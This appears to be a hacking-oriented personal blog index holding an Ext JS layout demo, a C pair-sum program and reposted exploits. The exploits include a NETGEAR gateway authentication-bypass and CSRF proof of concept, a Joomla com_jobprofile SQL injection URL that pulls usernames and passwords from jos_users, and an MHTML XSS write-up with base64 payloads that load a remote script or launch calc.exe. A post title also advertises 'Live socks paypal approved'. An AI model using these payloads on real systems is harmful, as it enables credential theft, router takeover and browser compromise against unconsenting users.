Thursday, August 1, 2013

Live socks paypal approved (130)

4:31 PM    No comments


Read More

Ext js example of tree, combobox , button and event handling

4:30 PM  , , , , , , ,  No comments

<html>
<head>
<title>Complex Layout</title>

    <!-- GC -->

<style type="text/css">
p {
    margin:5px;
}
.settings {
    background-image:url(../shared/icons/fam/folder_wrench.png);
}
.nav {
    background-image:url(../shared/icons/fam/folder_go.png);
}
.info {
    background-image:url(../shared/icons/fam/information.png);
}
</style>
<script type="text/javascript" src="../../examples/shared/include-ext.js"></script>
<script type="text/javascript" src="../../examples/shared/options-toolbar.js"></script>
<script type="text/javascript">
    Ext.require(['*']);

    Ext.onReady(function() {

        Ext.QuickTips.init();

        // NOTE: This is an example showing simple state management. During development,
        // it is generally best to disable state management as dynamically-generated ids
        // can change across page loads, leading to unpredictable results.  The developer
        // should ensure that stable state ids are set for stateful components in real apps.
        Ext.state.Manager.setProvider(Ext.create('Ext.state.CookieProvider'));

        var viewport = Ext.create('Ext.Viewport', {
            id: 'border-example',
            layout: 'border',
            items: [
            // create instance immediately
           /* Ext.create('Ext.Component', {
                region: 'north',
                height: 32, // give north and south regions a height
                autoEl: {
                    tag: 'div',
                    html:'<p>north - generally for menus, toolbars and/or advertisements</p>'
                }
            }),*/
Ext.create('Ext.form.ComboBox', {
fieldLabel: 'Car Manufacturer',
labelwidth:200,
//store: carManufacturersStore,
queryMode: 'local',
width:200,
displayField: 'name',
//valueField: 'name',
//renderTo: Ext.getBody()
}),
   {
                // lazily created panel (xtype:'panel' is default)
                region: 'south',
                contentEl: 'south',
                split: true,
                height: 100,
                minSize: 100,
                maxSize: 200,
                collapsible: true,
                collapsed: true,
                title: 'South',
                margins: '0 0 0 0'
            }, {
                xtype: 'tabpanel',
                region: 'east',
                title: 'East Side',
                dockedItems: [{
                    dock: 'top',
                    xtype: 'toolbar',
                    items: [ '->', {
                       xtype: 'button',
                       text: 'test',
                       tooltip: 'Test Button'
                    }]
                }],
                animCollapse: true,
                collapsible: true,
                split: true,
                width: 225, // give east and west regions a width
                minSize: 175,
                maxSize: 400,
                margins: '0 5 0 0',
                activeTab: 1,
                tabPosition: 'bottom',
                items: [{
                    html: '<p>A TabPanel component can be a region.</p>',
                    title: 'A Tab',
                    autoScroll: true
                }, Ext.create('Ext.grid.PropertyGrid', {
                        title: 'Property Grid',
                        closable: true,
                        source: {
                            "(name)": "Properties Grid",
                            "grouping": false,
                            "autoFitColumns": true,
                            "productionQuality": false,
                            "created": Ext.Date.parse('10/15/2006', 'm/d/Y'),
                            "tested": false,
                            "version": 0.01,
                            "borderWidth": 1
                        }
                    })]
            }, {
                region: 'west',
                stateId: 'navigation-panel',
              //  id: 'west-panel', // see Ext.getCmp() below
               //title: 'West',
                split: true,
                width: 200,
                minWidth: 175,
                maxWidth: 400,
hideheader:true,
                collapsible: false,
                animCollapse: false,
                margins: '0 0 0 5',
items:[Ext.create('Ext.button.Button', {
text: 'My Test Button',
listeners: {
click: function(button, e, options){
guestCount = viewport.items.length - 2;
 viewport.add({
//xtype: 'combobox',
//emptytext: 'My Test Button',
 region: this,
  margins: '0 0 0 5',
autoHeight: true,
//Ext.create('Ext.tree.Panel', {
xtype:'treepanel',
    renderTo: Ext.getBody(),
    title: 'Simple Tree',
    width: 150,
    height: 150,
    root: {
        text: 'Root',
        expanded: true,
        children: [
            {
                text: 'Child 1',
                leaf: true
            },
            {
                text: 'Child 2',
                leaf: true
            },
            {
                text: 'Child 3',
                expanded: true,
                children: [
                    {
                        text: 'Grandchild',
                        leaf: true
                    }
                ]
            }
        ]
    }
//})
})


},
 /*mouseover: function() {
            // set a new config which says we moused over, if not already set
           // if (!this.mousedOver) {
             //   this.mousedOver = true;
                alert('You moused over a button!\n\nI wont do this again.');
          //  }
}*/
}
//renderTo: Ext.getBody()
}),
Ext.create('Ext.button.Button', {
text: 'My Test Button 2',
listeners: {
click: function(button, e, options){
alert('you hahe clicked me'+ this)
}
}
}),
{
xtype: 'combobox',
fieldLabel: 'Select User',
labelWidth:50,
width:150,
queryMode: 'local',
    displayField: 'name',
emptytext:'select your n',
    valueField: 'abbr',
selectOnFocus : true,
store:
{
fields: ['abbr', 'name'],
    data : [
        {"abbr":"AL", "name":"Alabama"},
        {"abbr":"AK", "name":"Alaska"},
        {"abbr":"AZ", "name":"Arizona"}
     
    ]
},
listeners: {
'select': function(combo, e, options){
if(this.value=='AZ')
{//var w=Ext.getCmp('east-panel'),
viewport.add({
region: 'center', // a center region is ALWAYS required for border layout
xtype:'panel',
//deferredRender: false,
                activeTab: 0,     // first tab initially active
                items: [{
                    //contentEl: 'center',
contentEl: 'center2',
                    title: 'iam numberthree',
                    closable: false,
                    autoScroll: true


                }]

}
)
}
}
}
}


],
                /*layout: 'accordion',
                items: [{
                  //  contentEl: 'west',
                   // title: 'Navigation',
                 //   iconCls: 'nav' // see the HEAD section for style used

                }, {
                    title: 'Settings',
                    html: '<p>Some settings in here.</p>',
                    iconCls: 'settings'
                }, {
                    title: 'Information',
                    html: '<p>Some info in here.</p>',
                    iconCls: 'info'
                }]*/
            },
            // in this instance the TabPanel is not wrapped by another panel
            // since no title is needed, this Panel is added directly
            // as a Container
            Ext.create('Ext.tab.Panel', {
                region: 'center', // a center region is ALWAYS required for border layout
                deferredRender: false,
                activeTab: 0,     // first tab initially active
                items: [{
                    contentEl: 'center1',
                    title: 'Close Me',
                    closable: false,
                    autoScroll: true
                }, {
                    contentEl: 'center2',
                    title: 'Center Panel',
                    autoScroll: true
                }]
            })]
        });
        // get a reference to the HTML element with id "hideit" and add a click listener to it
        Ext.get("hideit").on('click', function(){
            // get a reference to the Panel that was created with id = 'west-panel'
            var w = Ext.getCmp('west-panel');
            // expand or collapse that Panel based on its collapsed property state
            w.collapsed ? w.expand() : w.collapse();
        });
    });
    </script>
</head>
<body>
    <!-- use class="x-hide-display" to prevent a brief flicker of the content -->
    <div id="west" class="x-hide-display">
        <p>Hi. I'm the west panel.</p>
    </div>
    <div id="center2" class="x-hide-display">
        <a id="hideit" href="#">Toggle the west region</a>
        <p>My closable attribute is set to false so you can't close me. The other center panels can be closed.</p>
        <p>The center panel automatically grows to fit the remaining space in the container that isn't taken up by the border regions.</p>
        <hr>
        <p>Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Sed metus nibh, sodales a, porta at, vulputate eget, dui. Pellentesque ut nisl. Maecenas tortor turpis, interdum non, sodales non, iaculis ac, lacus. Vestibulum auctor, tortor quis iaculis malesuada, libero lectus bibendum purus, sit amet tincidunt quam turpis vel lacus. In pellentesque nisl non sem. Suspendisse nunc sem, pretium eget, cursus a, fringilla vel, urna. Aliquam commodo ullamcorper erat. Nullam vel justo in neque porttitor laoreet. Aenean lacus dui, consequat eu, adipiscing eget, nonummy non, nisi. Morbi nunc est, dignissim non, ornare sed, luctus eu, massa. Vivamus eget quam. Vivamus tincidunt diam nec urna. Curabitur velit. Quisque dolor magna, ornare sed, elementum porta, luctus in, leo.</p>
        <p>Donec quis dui. Sed imperdiet. Nunc consequat, est eu sollicitudin gravida, mauris ligula lacinia mauris, eu porta dui nisl in velit. Nam congue, odio id auctor nonummy, augue lectus euismod nunc, in tristique turpis dolor sed urna. Donec sit amet quam eget diam fermentum pharetra. Integer tincidunt arcu ut purus. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Nulla blandit malesuada odio. Nam augue. Aenean molestie sapien in mi. Suspendisse tincidunt. Pellentesque tempus dui vitae sapien. Donec aliquam ipsum sit amet pede. Sed scelerisque mi a erat. Curabitur rutrum ullamcorper risus. Maecenas et lorem ut felis dictum viverra. Fusce sem. Donec pharetra nibh sit amet sapien.</p>
        <p>Aenean ut orci sed ligula consectetuer pretium. Aliquam odio. Nam pellentesque enim. Nam tincidunt condimentum nisi. Maecenas convallis luctus ligula. Donec accumsan ornare risus. Vestibulum id magna a nunc posuere laoreet. Integer iaculis leo vitae nibh. Nam vulputate, mauris vitae luctus pharetra, pede neque bibendum tellus, facilisis commodo diam nisi eget lacus. Duis consectetuer pulvinar nisi. Cras interdum ultricies sem. Nullam tristique. Suspendisse elementum purus eu nisl. Nulla facilisi. Phasellus ultricies ullamcorper lorem. Sed euismod ante vitae lacus. Nam nunc leo, congue vehicula, luctus ac, tempus non, ante. Morbi suscipit purus a nulla. Sed eu diam.</p>
        <p>Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Cras imperdiet felis id velit. Ut non quam at sem dictum ullamcorper. Vestibulum pharetra purus sed pede. Aliquam ultrices, nunc in varius mattis, felis justo pretium magna, eget laoreet justo eros id eros. Aliquam elementum diam fringilla nulla. Praesent laoreet sapien vel metus. Cras tempus, sapien condimentum dictum dapibus, lorem augue fringilla orci, ut tincidunt eros nisi eget turpis. Nullam nunc nunc, eleifend et, dictum et, pharetra a, neque. Ut feugiat. Aliquam erat volutpat. Donec pretium odio nec felis. Phasellus sagittis lacus eget sapien. Donec est. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae;</p>
        <p>Vestibulum semper. Nullam non odio. Aliquam quam. Mauris eu lectus non nunc auctor ullamcorper. Sed tincidunt molestie enim. Phasellus lobortis justo sit amet quam. Duis nulla erat, varius a, cursus in, tempor sollicitudin, mauris. Aliquam mi velit, consectetuer mattis, consequat tristique, pulvinar ac, nisl. Aliquam mattis vehicula elit. Proin quis leo sed tellus scelerisque molestie. Quisque luctus. Integer mattis. Donec id augue sed leo aliquam egestas. Quisque in sem. Donec dictum enim in dolor. Praesent non erat. Nulla ultrices vestibulum quam.</p>
        <p>Duis hendrerit, est vel lobortis sagittis, tortor erat scelerisque tortor, sed pellentesque sem enim id metus. Maecenas at pede. Nulla velit libero, dictum at, mattis quis, sagittis vel, ante. Phasellus faucibus rutrum dui. Cras mauris elit, bibendum at, feugiat non, porta id, neque. Nulla et felis nec odio mollis vehicula. Donec elementum tincidunt mauris. Duis vel dui. Fusce iaculis enim ac nulla. In risus.</p>
        <p>Donec gravida. Donec et enim. Morbi sollicitudin, lacus a facilisis pulvinar, odio turpis dapibus elit, in tincidunt turpis felis nec libero. Nam vestibulum tempus ipsum. In hac habitasse platea dictumst. Nulla facilisi. Donec semper ligula. Donec commodo tortor in quam. Etiam massa. Ut tempus ligula eget tellus. Curabitur id velit ut velit varius commodo. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Nulla facilisi. Fusce ornare pellentesque libero. Nunc rhoncus. Suspendisse potenti. Ut consequat, leo eu accumsan vehicula, justo sem lobortis elit, ac sollicitudin ipsum neque nec ante.</p>
        <p>Aliquam elementum mauris id sem. Vivamus varius, est ut nonummy consectetuer, nulla quam bibendum velit, ac gravida nisi felis sit amet urna. Aliquam nec risus. Maecenas lacinia purus ut velit. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Suspendisse sit amet dui vitae lacus fermentum sodales. Donec varius dapibus nisl. Praesent at velit id risus convallis bibendum. Aliquam felis nibh, rutrum nec, blandit non, mattis sit amet, magna. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Etiam varius dignissim nibh. Quisque id orci ac ante hendrerit molestie. Aliquam malesuada enim non neque.</p>
    </div>
    <div id="center1" class="x-hide-display">
        <p><b>Done reading me? Close me by clicking the X in the top right corner.</b></p>
        <p>Vestibulum semper. Nullam non odio. Aliquam quam. Mauris eu lectus non nunc auctor ullamcorper. Sed tincidunt molestie enim. Phasellus lobortis justo sit amet quam. Duis nulla erat, varius a, cursus in, tempor sollicitudin, mauris. Aliquam mi velit, consectetuer mattis, consequat tristique, pulvinar ac, nisl. Aliquam mattis vehicula elit. Proin quis leo sed tellus scelerisque molestie. Quisque luctus. Integer mattis. Donec id augue sed leo aliquam egestas. Quisque in sem. Donec dictum enim in dolor. Praesent non erat. Nulla ultrices vestibulum quam.</p>
        <p>Duis hendrerit, est vel lobortis sagittis, tortor erat scelerisque tortor, sed pellentesque sem enim id metus. Maecenas at pede. Nulla velit libero, dictum at, mattis quis, sagittis vel, ante. Phasellus faucibus rutrum dui. Cras mauris elit, bibendum at, feugiat non, porta id, neque. Nulla et felis nec odio mollis vehicula. Donec elementum tincidunt mauris. Duis vel dui. Fusce iaculis enim ac nulla. In risus.</p>
        <p>Donec gravida. Donec et enim. Morbi sollicitudin, lacus a facilisis pulvinar, odio turpis dapibus elit, in tincidunt turpis felis nec libero. Nam vestibulum tempus ipsum. In hac habitasse platea dictumst. Nulla facilisi. Donec semper ligula. Donec commodo tortor in quam. Etiam massa. Ut tempus ligula eget tellus. Curabitur id velit ut velit varius commodo. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Nulla facilisi. Fusce ornare pellentesque libero. Nunc rhoncus. Suspendisse potenti. Ut consequat, leo eu accumsan vehicula, justo sem lobortis elit, ac sollicitudin ipsum neque nec ante.</p>
        <p>Aliquam elementum mauris id sem. Vivamus varius, est ut nonummy consectetuer, nulla quam bibendum velit, ac gravida nisi felis sit amet urna. Aliquam nec risus. Maecenas lacinia purus ut velit. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Suspendisse sit amet dui vitae lacus fermentum sodales. Donec varius dapibus nisl. Praesent at velit id risus convallis bibendum. Aliquam felis nibh, rutrum nec, blandit non, mattis sit amet, magna. Lorem ipsum dolor sit amet, consectetuer adipiscing elit. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Etiam varius dignissim nibh. Quisque id orci ac ante hendrerit molestie. Aliquam malesuada enim non neque.</p>
    </div>
    <div id="props-panel" class="x-hide-display" style="width:200px;height:200px;overflow:hidden;">
    </div>
    <div id="south" class="x-hide-display">
        <p>south - generally for informational stuff, also could be for status bar</p>
    </div>
</body>
</html>

Read More

Friday, February 15, 2013

Given an array A[] and a number x, check for pair in A[] with sum as x

7:19 AM  , , , , ,  No comments 

# include 
# define bool int

void quickSort(int *, int, int);

bool hasArrayTwoCandidates(int A[], int arr_size, int sum)
{
    int l, r;

    /* Sort the elements */
    quickSort(A, 0, arr_size-1);

    /* Now look for the two candidates in the sorted 
       array*/
    l = 0;
    r = arr_size-1; 
    while(l < r)
    {
         if(A[l] + A[r] == sum)
              return 1; 
         else if(A[l] + A[r] < sum)
              l++;
         else // A[i] + A[j] > sum
              r--;
    }    
    return 0;
}

/* Driver program to test above function */
int main()
{
    int A[] = {1, 4, 45, 6, 10, -8};
    int n = 16;
    int arr_size = 6;
   
    if( hasArrayTwoCandidates(A, arr_size, n))
        printf("Array has two elements with sum 16");
    else
        printf("Array doesn't have two elements with sum 16 ");

    getchar();
    return 0;
}

/* FOLLOWING FUNCTIONS ARE ONLY FOR SORTING 
    PURPOSE */
void exchange(int *a, int *b)
{
    int temp;
    temp = *a;
    *a   = *b;
    *b   = temp;
}

int partition(int A[], int si, int ei)
{
    int x = A[ei];
    int i = (si - 1);
    int j;

    for (j = si; j <= ei - 1; j++)
    {
        if(A[j] <= x)
        {
            i++;
            exchange(&A[i], &A[j]);
        }
    }
    exchange (&A[i + 1], &A[ei]);
    return (i + 1);
}

/* Implementation of Quick Sort
A[] --> Array to be sorted
si  --> Starting index
ei  --> Ending index
*/
void quickSort(int A[], int si, int ei)
{
    int pi;    /* Partitioning index */
    if(si < ei)
    {
        pi = partition(A, si, ei);
        quickSort(A, si, pi - 1);
        quickSort(A, pi + 1, ei);
    }
}

Read More

Friday, December 30, 2011

NETGEAR Wireless Cable Modem Gateway Auth Bypass and CSRF

2:10 AM    No comments

HTML Code:
Release Date.                  20-Sep-2011 Last Update.                    - Vendor Notification Date.      22-Mar-2011 Product.                        NETGEAR Wireless Cable Modem Gateway                                 CG814WG Affected versions.             Hardware 1.03,                                 Software V3.9.26 R14 verified,                                 possibly others Severity Rating.               High Impact.                         Authentication bypass,                                 Cross Site Request Forgery Attack Vector.                 Remote without  authentication Solution Status.               Upgrade to R15 (by  contacting NETGEAR) CVE reference.                 Not yet assigned    Details. The NETGEAR Wireless Cable Modem Gateway CG814WG is supplied by  ISP's as customer premises equipment within Australia and abroad. It is  a centrally managed ISP solution whereby each ISP's devices run a  customised firmware and configuration changes and updates can be pushed  out as required.   Basic authentication is used as the primary and only  authentication mechanism for the administrator interface on the device.  The basic authentication can be bypassed by sending a valid POST request  to the device without sending any authentication header. The response  from the device sends the user to another page that requests basic  authentication, however at this point the request has already been  processed.   An example of attacks using the basic authentication bypass  may include changing the admin password or enabling the remote admin  interface (Internet facing).   Additionally, due to the lack of CSRF  protection in the web application, the bypass attack can be coupled with  CSRF to have a victim enable the remote admin interface to the  Internet, where an attacker can then use the bypass attack again across  the remote admin interface to reset the admin password and access the  device. This attack is possible when targeting a victim that is behind  the NETGEAR device on the same segment as the web administrator  interface whom has browsed to a malicious site containing the CSRF  attack.   NETGEAR was notified of this vulnerability on 22 March 2011,  but we never received a response or acknowledgement of the issue or fix.  Sense of Security notified local ISP's and it was escalated by a local  ISP who worked with NETGEAR to develop and test an update. Sense of  Security was never provided an opportunity to validate the fixes in the  latest firmware version. Given the severity of the issue it would be  prudent for NETGEAR to notify and supply an update to all of its  customers.   Proof of Concept. By embedding the below HTML in a website  and having a victim browse to the website the remote management  interface to the Internet would be enabled. An attacker could then use  one of the hardcoded passwords for the device to access it, or use a  basic authentication bypass to change the admin password. Alternatively,  the attacker could conduct a CSRF attack that implements two POST  requests to have the remote admin interface enabled, and the admin  password changed.   The example here is a basic proof of concept, more  complex examples which include JavaScript redirects to mask the basic  authentication pop-up would be more stealthy.      

"http://192.168.0.1/goform/RgRemoteManagement"

method="POST" name="form"> "hidden"  name="NetgearRmEnable" value="0x01"> "hidden"  name="NetgearRmPortNumber" value="1337"> "hidden"  name="NetgearUserLevel" value="1">      Solution. Ask your ISP to obtain the latest firmware  from NETGEAR and deploy it to your device.   Discovered by. Sense of  Security Labs.  :80:

Read More

Joomla Component Jobprofile SQL INJECTION

2:09 AM    No comments

FROM:1337day.com


Code:
[~] Joomla Component Jobprofile (com_jobprofile) SQL Injection Vulnerability
[~] Author : kaMtiEz (kamtiez@exploit-id.com)
[~] Homepage : http://www.indonesiancoder.com / http://exploit-id.com / http://magelangcyber.web.id
[~] Date : 2 Dec , 2011
 
[ Software Information ]
 
[+] Vendor : http://www.thakkertech.com/
[+] INFO : http://extensions.joomla.org/extensions/ads-a-affiliates/jobs-a-recruitment/11924
[+] Download : http://www.thakkertech.com/products/joomla-extensions/components/jobprofile-joomla-component-detail.html
[+] Version : null / 1.0 maybe :D
[+] Price : 25,00
[+] Vulnerability : SQL INJECTION
[+] Dork : "think it :D"
[+] LOCATION :  INDONESIA -
 
[ Vulnerable File ]
 
 http://127.0.0.1/[kaMtiEz]/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=[SQL]
 
[ XpL ]
 
 http://127.0.0.1/[kaMtiEz]/index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=-1+union+all+select+1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9+from+jos_users--
 

Read More

Microsoft Internet Explorer MHTML Protocol Handler XSS

2:08 AM    No comments 

Hacking with mhtml protocol handler
 
Author: www.80vul.com [Email:5up3rh3i#gmail.com]
Release Date: 2011/1/15
References: http://www.80vul.com/mhtml/Hacking%20with%20mhtml%20protocol%20handler.txt
 
Ph4nt0m Webzine 0x05 (http://secinn.appspot.com/pstzine) Was finally released yesterday, There are two articles about the browser security[0x05 and 0x06].If the combination of both, we can complete a lot of interesting attacks...
 
1.Cross Site Scripting by upload mhtml file
 
Using the mhtml protocol handler,The file extension is ignored.so the attacker use renname the  mhtml file to a *.jpg file,etc. then upload it to the target site...
 
ofcouser ,we can use "copy /b 1.jpg + 1.mhtml 2.jpg" to bypass some upload file format security restrictions
 
then use iframe tag src to it:
 

 
2.Cross Site Scripting mhtml-file string injection
 
the mhtml-file format is only base on CRLF,so if we can injection CRLF, the site may be attacked.
 
poc:
 
test it on win7 system pls.
 

 
if win-xp or win2k3 system,pls do it by the second urlencode.
 
mhtml-file string injection in JOSN file, some sites restrict the JOSN file's Content-Type to defense xss. maybe we can use mhtml-file string injection to pass it :)
 
3.bypass X-Frame-Options
 
X-Frame-Options did not protect the mhtml protocol handler.
 
the demo:
 


 
4.mhtml+file://uncpath+Adobe Reader 9 == local xss vul
 
Billy (BK) Rios introduced a very interesting approach to Steal local files on the RuxCon/Baythreat(https://xs-sniper.com/blog/2010/12/17/will-it-blend/) ,it used  "Script src to local files in the LocalLow directory" by file:// +java apple +Adobe Reader+Adobe flash to complete it. but if used mhtml+file://uncpath, so easy to do it.
 
Demo:
 
test it on win2k3+ie8+Adobe Reader 9
 
http://www.80vul.com/hackgame/xs-g0.php?username=Administrator
 
 
5.mhtml+file://uncpath+word == local xss vul
 
demo:http://www.80vul.com/mhtml/word.doc
 
download it, and save it on c:\word.doc and open it. u can get the alert c:\boot.ini 's content.
 
this is base on "Microsoft word javascript execution"(http://marc.info/?l=bugtraq&m=121121432823704&w=2).
 
to make the proof of concept follow the following steps:
 
1-Make a html file and paste xss code
2-Open the html file with the word and save as c:\word.xml
3-Open the word.xml with the notepad,and inject the mhtml code in aaaaa 
4-Rename c:\word.xml to c:\word.doc
5-Open c:\word.doc file
 
xss code
---------------------------------------------------------


aaaaa
----------------------------------------------------------
 
mhtml code
--------------------------------------------------------
/*
Content-Type: multipart/related; boundary="_boundary_by_mere":
 
--_boundary_by_mere
Content-Location:cookie
Content-Transfer-Encoding:base64
 
PGJvZHk+DQo8c2NyaXB0IHNyYz0naHR0cDovL3d3dy44MHZ1bC5jb20vaGFja2dhbWUvZ28uanMnPjwvc2NyaXB0Pg0KPC9ib2R5Pg0K
--_boundary_by_mere--
 
*/
--------------------------------------------------------
 
if u use this vul to attack someone,u need to known the word file path where save the download file. and lots of guns used on the desktop :)
  
"Microsoft word javascript execution" is only work on office 2k3 and 2k7, In other versions u can make the link, and src to http://www.80vul.com/hackgame/word.htm
 
update
ofcouse ,this way maybe work on anoher file type like:*.pdf by app.launchURL()
 
 
6. Coss Zone Scripting
 
First we would like to mention a very old vulnerability:
 

 
This vulnerability (by firebug9[http://hi.baidu.com/firebug9/blog/item/b7627c4624cd880f6a63e5e7.html]) allows you to execute any program on "My Computer" zone,Been tested and found to this vul work on ie6/ie7/ie8+win2k/winxp/win2k3
 
Then repeat "5.mhtml+file://uncpath+word == local xss vul" steps and change:
 
xss code
---------------------------------------------------------


aaaaa
----------------------------------------------------------
 
mhtml code
--------------------------------------------------------
/*
Content-Type: multipart/related; boundary="_boundary_by_mere":
 
--_boundary_by_mere
Content-Location:cookie
Content-Transfer-Encoding:base64
 
PE9CSkVDVCBDTEFTU0lEPUNMU0lEOjEyMzQ1Njc4LTEyMzQtNDMyMS0xMjM0LTExMTExMTExMTExMSBDT0RFQkFTRT1jOi93aW5kb3dzL3N5c3RlbTMyL2NhbGMuZXhlPjwvT0JKRUNUPg==
--_boundary_by_mere--
 
*/
--------------------------------------------------------
 
 
thx d4rkwind(http://hi.baidu.com/d4rkwind/) for his excellent paper.
 
 
About Ph4nt0m Webzine
 
Ph4nt0m Webzine is a free network Security Magazine,We accept articles in English and Chinese, you are welcome contributions .
mailto:root_at_ph4nt0m.org pls.thank

Read More

Admin login Page

2:06 AM    No comments

Coded by ME

Admin login panel page



Code below



Code:





Crash_Override Admin Login













  

 

     

      

Crash_Override Admin Control Panel  Login



  






  



    Enter your username and pass (case sensitive)

  










 



  Username: 

  


 




  Password: 

  

  




   

  

  








  COOKIES MUST BE ENABLED ON YOUR WEB BROWSER!


   


  









 

Read More
Newer Posts Older Posts Home